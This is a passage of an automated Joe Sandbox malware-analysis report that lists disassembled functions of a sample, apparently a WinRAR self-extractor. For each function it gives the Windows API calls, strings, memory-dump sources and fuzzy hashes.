ShowWindow.USER32(?,00000005,00000000), ref: 01019FDB
SetWindowTextW.USER32(?,00000000), ref: 01019FE3
ShowWindow.USER32(00000000,00000005), ref: 01019FF9

Strings

RarHtmlClassName, xrefs: 01019FA5

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b395ac767f1ee5ca522dc01ca50217bed6f14f6c97ca6fac2fb61a6700e34cd5
Instruction ID: 0ad53bd097c111e328bfe78f90bff9c6bd1d125c2d8257d4577bc6f76f565399
Opcode Fuzzy Hash: b395ac767f1ee5ca522dc01ca50217bed6f14f6c97ca6fac2fb61a6700e34cd5
Instruction Fuzzy Hash: 2741BF32504210EFDB625F689C48B6BBFB8FF48755F004599F9C99E05ACB39D908CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01019955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101995E
_wcslen.LIBCMT ref: 01019993

Strings

 , xrefs: 01019A21
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 01019987
<br>, xrefs: 010199DF
, xrefs: 010199B0

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: b74edb6929436bc244b9498f4b3f0cdd88069e7cdcaf3f9f9ec68526a18b4bb9
Instruction ID: 38924c30123a56f2ce046835b1cd32376b6faf3910bc98440ca2b0d0564023b0
Opcode Fuzzy Hash: b74edb6929436bc244b9498f4b3f0cdd88069e7cdcaf3f9f9ec68526a18b4bb9
Instruction Fuzzy Hash: EC31503364434655DE31AF589C51BBB73E8FB80714F90441EF8C68B284FA6CA94883E1

Uniqueness

Uniqueness Score: -1.00%

Function 0102C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0102C868: _free.LIBCMT ref: 0102C891

_free.LIBCMT ref: 0102C8F2

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(?,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?,?), ref: 01028DF4

_free.LIBCMT ref: 0102C8FD
_free.LIBCMT ref: 0102C908
_free.LIBCMT ref: 0102C95C
_free.LIBCMT ref: 0102C967
_free.LIBCMT ref: 0102C972
_free.LIBCMT ref: 0102C97D

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: d49eef682295cc6da29031b70fd06714aba967410b75ace28d1d2930ad781325
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: ED111F71580B26AAF520B7B1CD05FCF7BEC9F25B10F508C16F2DD66061DAA5B509CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,0101E669,0101E5CC,0101E86D), ref: 0101E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0101E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0101E630

Strings

KERNEL32.DLL, xrefs: 0101E600
AcquireSRWLockExclusive, xrefs: 0101E615
ReleaseSRWLockExclusive, xrefs: 0101E625

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction ID: eed29a717fad5c5207547d9515824649d79a3a4fc0f0b95e3132f7e2b72a8293
Opcode Fuzzy Hash: e8f6cb3d95cbfd10081c7595d26ca8b5f1ead1182bb08c27738d45fb239e09ed
Instruction Fuzzy Hash: 3AF0C2317402229B5B734E69DC94A6E76CC6F8D6D13400CB9EEC5DB11DEB2DC4909B90

Uniqueness

Uniqueness Score: -1.00%

Function 0101146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 010114C2

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010114E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 01011500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01011513
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011523
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011533

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction ID: f583d2db3ec9669b8f681982f0b0e9978481b5ab90780b13c27df6cb8ad16a9f
Opcode Fuzzy Hash: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
Instruction Fuzzy Hash: 4231E779108346ABC704DFA8C88499BBBF8BF98614F444A1EF999C3210E734D549CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 01022AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01022AF1,010202FC,0101FA34), ref: 01022B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01022B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022B2F
SetLastError.KERNEL32(00000000,01022AF1,010202FC,0101FA34), ref: 01022B81

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 979c291dfc27568c6f6438fc1a5433901f4f5b1d5a87f804f570c554524ad2a4
Instruction ID: bb55ba9f954199ee4e3bc201621d1030e3cecd48d3f3146a1eda6f64354b6752
Opcode Fuzzy Hash: 979c291dfc27568c6f6438fc1a5433901f4f5b1d5a87f804f570c554524ad2a4
Instruction Fuzzy Hash: C501F7321083326EAA7B29F8BC84A6B2F9DFF55774B60077AF5D0490D4EF1A48009344

Uniqueness

Uniqueness Score: -1.00%

Function 010297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01041098,01024674,01041098,?,?,010240EF,?,?,01041098), ref: 010297E9
_free.LIBCMT ref: 0102981C
_free.LIBCMT ref: 01029844
SetLastError.KERNEL32(00000000,?,01041098), ref: 01029851
SetLastError.KERNEL32(00000000,?,01041098), ref: 0102985D
_abort.LIBCMT ref: 01029863

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
Instruction ID: fef6a1ff4ba0ac7d96841ccccfb77500a72f15c4e6cfb2b33daae18bd342465a
Opcode Fuzzy Hash: 67f4cd3fce6b0d182a956079619c123b32db81bee57c7cd1c03e4f2cd32049f7
Instruction Fuzzy Hash: 23F02D35100633E6D7633238BC48B5B2BEDAFE0778F290125F7D496145EE7584068224

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101DC72
TranslateMessage.USER32(?), ref: 0101DC7C
DispatchMessageW.USER32(?), ref: 0101DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC91

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction ID: d24f8354f28d46ca2992a11095e7357c1ccffc76a57a4ffd0eac8bcd5c2e9692
Opcode Fuzzy Hash: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
Instruction Fuzzy Hash: 8BF08C32A0021ABBDB306AE5EC4CDCBBFBCFF42791B004411F54AD6018D63A804AC7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0100C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100B92D: _wcsrchr.LIBVCRUNTIME ref: 0100B944

_wcslen.LIBCMT ref: 0100C197
_wcslen.LIBCMT ref: 0100C1DF

Strings

.exe, xrefs: 0100C10B
.sfx, xrefs: 0100C11A
.rar, xrefs: 0100C0E1, 0100C134

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction ID: f8fdc0eb304a38a48822d4014724dbe1f3f42bbe1e60aee1189b1e60e97c2f4e
Opcode Fuzzy Hash: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
Instruction Fuzzy Hash: 3C414821540312A6F733AF788A41ABB77E8EF42704F100ACEF9C56B4C0EB6449C2C391

Uniqueness

Uniqueness Score: -1.00%

Function 0101CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0101CE9D

Part of subcall function 0100B690: _wcslen.LIBCMT ref: 0100B696

_swprintf.LIBCMT ref: 0101CED1

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101CEF1
EndDialog.USER32(?,00000001), ref: 0101CFFE

Strings

%s%s%u, xrefs: 0101CEC6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 4c4168fd5f2f226ae2f3152e47934072c7a9e6686f68a0ad226f0419f12ac794
Instruction ID: 2a6ccd115dbcf8699bc6ce260b7aa61646cbd0c5dabdd4af58eddabe270d4c14
Opcode Fuzzy Hash: 4c4168fd5f2f226ae2f3152e47934072c7a9e6686f68a0ad226f0419f12ac794
Instruction Fuzzy Hash: 3541A8B1940659AADF219B94CD44EEE77FCEB45300F4080A6F989E7049DE798A44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0100BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0100A275,?,?,00000800,?,0100A23A,?,0100755C), ref: 0100BBC5
_wcslen.LIBCMT ref: 0100BC3B

Strings

UNC, xrefs: 0100BBA7
\\?\, xrefs: 0100BB52, 0100BB99, 0100BBF7, 0100BC4E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction ID: 5968d4eefcf2566524364e8e65dac9968c17bf7c32b67e8de69d086888e5e094
Opcode Fuzzy Hash: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
Instruction Fuzzy Hash: EA419F3944021BA6EF22AF64CC40EEE77ADBF55390F1044A6F9D4A7294EF74D9908B60

Uniqueness

Uniqueness Score: -1.00%

Function 0101B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0101B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0101B712
DeleteObject.GDI32(00000000), ref: 0101B744
DeleteObject.GDI32(00000000), ref: 0101B767

Part of subcall function 0101A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
Part of subcall function 0101A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
Part of subcall function 0101A6C2: LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
Part of subcall function 0101A6C2: LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
Part of subcall function 0101A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
Part of subcall function 0101A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A73E
Part of subcall function 0101A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
Part of subcall function 0101A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
Part of subcall function 0101A6C2: GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

], xrefs: 0101B71A

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction ID: 16b712900256b6ea0c26d4577ff3b0f1e10799bc8fd98efc3037b37251e17052
Opcode Fuzzy Hash: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
Instruction Fuzzy Hash: 9901D636641202A7E72277785D08ABF7AF9BF80662F080050F9C4A729CDF7E8C0946A0

Uniqueness

Uniqueness Score: -1.00%

Function 0101D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0101D675
SetDlgItemTextW.USER32(?,00000068), ref: 0101D684

Strings

RENAMEDLG, xrefs: 0101D618

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction ID: 3da7e24464a8ba92c67c79d341b1c875edef76f88cc7230921703cb23582bbf6
Opcode Fuzzy Hash: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
Instruction Fuzzy Hash: AD01F933244310BAE3214FA85E0DF5B7B9CBB5E701F010810F3C5A509DC7AF95048765

Uniqueness

Uniqueness Score: -1.00%

Function 01027E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027E24,?,?,01027DC4,?,0103C300,0000000C,01027F1B,?,00000002), ref: 01027E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01027EA6
FreeLibrary.KERNEL32(00000000,?,?,?,01027E24,?,?,01027DC4,?,0103C300,0000000C,01027F1B,?,00000002,00000000), ref: 01027EC9

Strings

mscoree.dll, xrefs: 01027E8C
CorExitProcess, xrefs: 01027E9E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1871aa85571e6d1c18df204273c84ab8f4b58f4c7b2fe0b31b0b8900b33e2e3d
Instruction ID: 9d8f774f1337a7ca9331fd5aafe7b40034a9611998c0449c968f6364b85c0149
Opcode Fuzzy Hash: 1871aa85571e6d1c18df204273c84ab8f4b58f4c7b2fe0b31b0b8900b33e2e3d
Instruction Fuzzy Hash: 5CF06831900218BBDF219FA5DC49B9EBFBDFF44715F0041A9F845A6254DB3A9E44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

Strings

CryptUnprotectMemory, xrefs: 0100F2EA
Crypt32.dll, xrefs: 0100F2CE
CryptProtectMemory, xrefs: 0100F2DE

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

